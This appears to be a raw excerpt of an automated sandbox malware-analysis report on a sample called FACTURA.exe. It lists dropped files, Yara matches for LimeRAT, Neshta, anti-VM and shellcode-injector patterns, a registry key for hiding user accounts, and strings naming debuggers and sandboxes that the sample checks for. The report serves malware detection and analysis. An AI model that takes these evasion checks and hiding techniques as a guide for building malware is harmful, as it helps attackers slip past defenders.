Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES-valencia\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ro-RO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\kk-KZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\uk-UA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ar-SA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fil-PH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sq-AL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ga-IE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdFilter.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\he-IL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sk-SK\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\vi-VN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nb-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\eu-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\is-IS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fi-FI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\DefenderCSP.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-CA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lv-LV\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nl-NL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\km-KH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\uk-UA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ProtectionManagement.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nb-NO\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\or-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpAzSubmit.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpClient.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hr-HR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ka-GE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\gu-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\kn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mi-NZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sv-SE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpSvc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mpextms.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpClient.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCommu.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdBoot.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ms-MY\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MsMpLics.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pl-PL\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lo-LA\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ta-IN\mpuxagent.dll.mui

Boot Survival:

Yara detected Neshta
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected LimeRAT
Source: Yara match File source: 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Hooking and other Techniques for Hiding and Protection:

May modify the system service descriptor table (often done to hook functions)
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp Binary or memory string: KeServiceDescriptorTable
Contains functionality to hide user accounts
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender
Source: C:\Users\user\Desktop\FACTURA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a36a8ae6.146.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6333813745.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6336709311.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6290353787.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6329279249.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6294532862.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected LimeRAT
Source: Yara match File source: 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected generic Shellcode Injector
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Windows Security Disabler
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: SUPERANTISPYWARE.EXE
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp Binary or memory string: PEID.EXE
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp Binary or memory string: API_LOG.DLL
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp Binary or memory string: !E!#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp Binary or memory string: "G!#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp Binary or memory string: "H!#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: DBGHELP.DLLSBIEDLL.DLL
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: OLLYDBGOLLYICEPEDITORLORDPEC32ASMIMPORTREC.EXE
Source: MpSigStub.exe, 00000024.00000003.6326616398.00000197A3216000.00000004.00000001.sdmp Binary or memory string: &[!#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp Binary or memory string: $C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 00000024.00000003.6326616398.00000197A3216000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp Binary or memory string: PTABLE)(LAPTOP)(NOTEBOOK)(SUB NOTEBOOK)%S \%D.%D.%D.%D%04X%04XSBIEDLL.DLLDBGHELP.DLLAPI_LOG.
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: REGMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLSBIEDLLX.DLLHTTP://
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE
Source: MpSigStub.exe, 00000024.00000003.6350540468.00000197A32DC000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp Binary or memory string: \MSNSNIFFER\MSNSNIFFER.EXE]
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: %Z!#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp Binary or memory string: &\MSNSNIFFER\MSNSNIFFER.EXE]
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: QEMU-GA.EXE
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:COPYRENAMED!AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp Binary or memory string: SNIFFER.EXE
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: PEBROWSEDBG.EXE
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: IFPROCESSEXISTS("SANDBOXIERPCSS.EXE")ORPROCESSEXISTS("SANDBOXIEDCOMLAUNCH.EXE")THEN
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpUpdate.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-PT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nl-NL\MpAsDesc.dll.mui Jump to dropped file
